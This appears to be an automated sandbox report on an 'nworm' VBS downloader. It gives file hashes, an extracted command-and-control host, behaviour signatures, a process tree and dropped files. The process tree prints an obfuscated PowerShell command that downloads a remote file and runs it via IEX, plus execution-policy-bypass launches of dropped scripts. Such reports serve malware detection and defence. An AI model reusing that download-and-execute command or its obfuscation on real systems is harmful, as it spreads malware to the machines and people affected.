nworm | 00b3ede6f9c3073b02afc09611974bdc4765400ac8c039d620679083b88f63fe

Analysis

max time kernel
78s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
28-04-2022 06:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ASNQSKJPXJLKFXSIEUQYZ.vbs
Size

2KB
MD5

f04ca5c16f111ab69293045badd53ad9
SHA1

1184fafe345b6f79d6a28d87ef957d7f96b76f52
SHA256

00b3ede6f9c3073b02afc09611974bdc4765400ac8c039d620679083b88f63fe
SHA512

f07b185f0b78ff3962767a7f2d85957ca9057ee049fdf90d041bd405dcc23fe2a79c71143fde8b907153942be9525941af7ffc2d9e25f6bf1717cb43990f200b

Score

10^/10

nworm downloader worm

Malware Config

Extracted

Family

nworm

Version

v0.3.8

hnahmoneu.duckdns.org:6391

Mutex

30896040

Signatures

NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
worm downloader nworm

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Powershell.exepowErshEll.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3720	4932	Powershell.exe	42
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4648	4932	powErshEll.exe	42

Blocklisted process makes network request 1 IoCs

Processes:

Powershell.exe

flow	pid	Process
5	3720	Powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description	pid	Process	procid_target
PID 4236 set thread context of 4956	4236	powershell.exe	102

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

Powershell.exepowershell.exepowErshEll.exepowershell.exe

pid	Process
3720	Powershell.exe
3720	Powershell.exe
3644	powershell.exe
3644	powershell.exe
4648	powErshEll.exe
4648	powErshEll.exe
4236	powershell.exe
4236	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Powershell.exepowershell.exepowErshEll.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3720	Powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	4648	powErshEll.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe
Token: 34	3644	powershell.exe
Token: 35	3644	powershell.exe
Token: 36	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe
Token: 34	3644	powershell.exe
Token: 35	3644	powershell.exe
Token: 36	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

Powershell.exepowershell.exepowErshEll.execmd.exepowershell.exe

description	pid	Process	procid_target
PID 3720 wrote to memory of 3644	3720	Powershell.exe	95
PID 3720 wrote to memory of 3644	3720	Powershell.exe	95
PID 3644 wrote to memory of 2348	3644	powershell.exe	96
PID 3644 wrote to memory of 2348	3644	powershell.exe	96
PID 4648 wrote to memory of 2132	4648	powErshEll.exe	99
PID 4648 wrote to memory of 2132	4648	powErshEll.exe	99
PID 2132 wrote to memory of 4236	2132	cmd.exe	100
PID 2132 wrote to memory of 4236	2132	cmd.exe	100
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102
PID 4236 wrote to memory of 4956	4236	powershell.exe	102

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASNQSKJPXJLKFXSIEUQYZ.vbs"
1⤵
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell $OZKQAUNQZBLNAOSVUSYESJ = '[S55]!+$]+%*+![<%[[(1[52EM.I=*4$50233)@{\960!01}$^MREAdER]'.Replace('55]!+$]+%*+![<%[[(1[52','ySt').Replace('=*4$50233)@{\960!01}$^','O.StREA');$BXJWCEVOETSZXVTQVVBBQI = ($OZKQAUNQZBLNAOSVUSYESJ -Join '')| .('{1}{0}'-f'EX','I');$BFZNFKRZGXUCXFHDPCRKXY = '[SyS%6%+4/%=5{=\{8![%6+#6*T.W76\/(1*\*=(4@_@@/2<$]8ST]'.Replace('%6%+4/%=5{=\{8![%6+#6*','TEm.NE').Replace('76\/(1*\*=(4@_@@/2<$]8','EbREquE');$UBJZAYXIRZKFCCUCKLTOFV = ($BFZNFKRZGXUCXFHDPCRKXY -Join '')| .('{1}{0}'-f'EX','I');$HNWHJYJEZGKAPCJXAVBIDJ = 'Cr_})4!/]!57\*_9\{8<-<97TE'.Replace('_})4!/]!57\*_9\{8<-<97','Ea');$PYADPHPAUKFOLHATAFZQNV = 'GE\(#7%+58^$6<4!)!*0<2&&onSE'.Replace('\(#7%+58^$6<4!)!*0<2&&','tRESp');$RRJLPFSIPIYQFCZCXNSWIQ = 'GE1@)[6_08}$/}5&2+--(2%8REam'.Replace('1@)[6_08}$/}5&2+--(2%8','tRESponSESt');$EQLBEGTOHFJKWFRNRAQNWI = 'RE2{$[&]8)4\!4]]@0#]+9)_nD'.Replace('2{$[&]8)4\!4]]@0#]+9)_','aDToE'); .('{1}{0}'-f'EX','I')($BXJWCEVOETSZXVTQVVBBQI::new($UBJZAYXIRZKFCCUCKLTOFV::$HNWHJYJEZGKAPCJXAVBIDJ('https://www.wnsolutions.potius.com.br/ServerTyw.txt').$PYADPHPAUKFOLHATAFZQNV().$RRJLPFSIPIYQFCZCXNSWIQ()).$EQLBEGTOHFJKWFRNRAQNWI())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.ps1'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3644
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.vbs"
    3⤵
    PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powErshEll.exe
powErshEll -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\JHZOILCYEIXTNXBBHSHQJA.ps1'"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4236
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4956

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\JHZOILCYEIXTNXBBHSHQJA.ps1

Filesize
126KB

MD5
fc8efcbdcdc89d37b381fa6db4ec9308

SHA1
2072c4dd30100c355ff28b809be07431d7e66e67

SHA256
b6966b501a1b0a64d6e0c344d06d9699553609f689833bd7de399dd5642ea24c

SHA512
3cbe593cda440e08450b562dfc280fb78aa88008d25f190926b2d06b0c3ec8a50084a8dc1063d7bbe176b4c5ef95d0052a79d890a3fa34ba5acba686c777b51f

Download Submit
C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat

Filesize
127B

MD5
360d8e6abc69a97baf1750c414b09697

SHA1
f63946aa0b27ba1ab858fc046a0864cef1ef4a01

SHA256
9d821a4ba769baff76dbfd6584a0d1b4883f68d73f72826d7a4099bd013ecbaf

SHA512
bf23e4da7afa0b355754361cc3733e07d1e535382c45ec7112f89b12a9c99b7ebef3ccdd4dcf86c4b24125ac4dfab6845269e9b9febf37376110246658b0fe0a

Download Submit
C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.ps1

Filesize
457B

MD5
973e36e8a9121a4f784dba53991e019f

SHA1
7aa5a37eb96276ec77f8b24ce546da624afec0dd

SHA256
4391ed86e1f0d0bde77251776059dd4f7c09d063795689d3fbe21897e0f7f842

SHA512
17cba32147c7ee63ede683a44392bfc8f5f805208f3d086a4f46a06d0a5ec746014bd76c055c0d929a63a61b0ba94afadfee20e1700b13b904d9de6df3e2c4a9

Download Submit
C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.vbs

Filesize
1KB

MD5
84be9efc5a0934d7542b0a13e0bec996

SHA1
867b639c015281275e8645726d67bb8749616318

SHA256
723e3a490cc4b6f437b2d1b7f98087d1246fef52caf5a19c9f203cde15875a37

SHA512
52b0f1ed42852c34f0a54da7774298f64fc8eba6de34ce68253b7056da9904718831b3e51732c205053e823b61ba4cb8d21fad3d0e1187120631fbc0a49bf843

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Powershell.exe.log

Filesize
3KB

MD5
fee026663fcb662152188784794028ee

SHA1
3c02a26a9cb16648fad85c6477b68ced3cb0cb45

SHA256
dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b

SHA512
7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51aa87521f685fa8d4f4bdbd7684a350

SHA1
fd4027d9b24c41461525b0f3f764aa6b2ddd5803

SHA256
6e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6

SHA512
637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
75b4b2eecda41cec059c973abb1114c0

SHA1
11dadf4817ead21b0340ce529ee9bbd7f0422668

SHA256
5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

SHA512
87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
memory/2132-137-0x0000000000000000-mapping.dmp

Download
memory/2348-134-0x0000000000000000-mapping.dmp

Download
memory/3644-135-0x00007FFA981E0000-0x00007FFA98CA1000-memory.dmp

Filesize
10.8MB

Download
memory/3644-132-0x0000000000000000-mapping.dmp

Download
memory/3720-130-0x0000022929510000-0x0000022929532000-memory.dmp

Filesize
136KB

Download
memory/3720-131-0x00007FFA981E0000-0x00007FFA98CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4236-141-0x00007FFA981E0000-0x00007FFA98CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4236-143-0x0000024E91950000-0x0000024E9196A000-memory.dmp

Filesize
104KB

Download
memory/4236-139-0x0000000000000000-mapping.dmp

Download
memory/4648-140-0x00007FFA981E0000-0x00007FFA98CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4956-147-0x000000000040550E-mapping.dmp

Download
memory/4956-146-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4956-150-0x0000000005070000-0x000000000510C000-memory.dmp

Filesize
624KB

Download
memory/4956-151-0x00000000056D0000-0x0000000005C74000-memory.dmp

Filesize
5.6MB

Download
memory/4956-152-0x0000000002BA0000-0x0000000002C06000-memory.dmp

Filesize
408KB

Download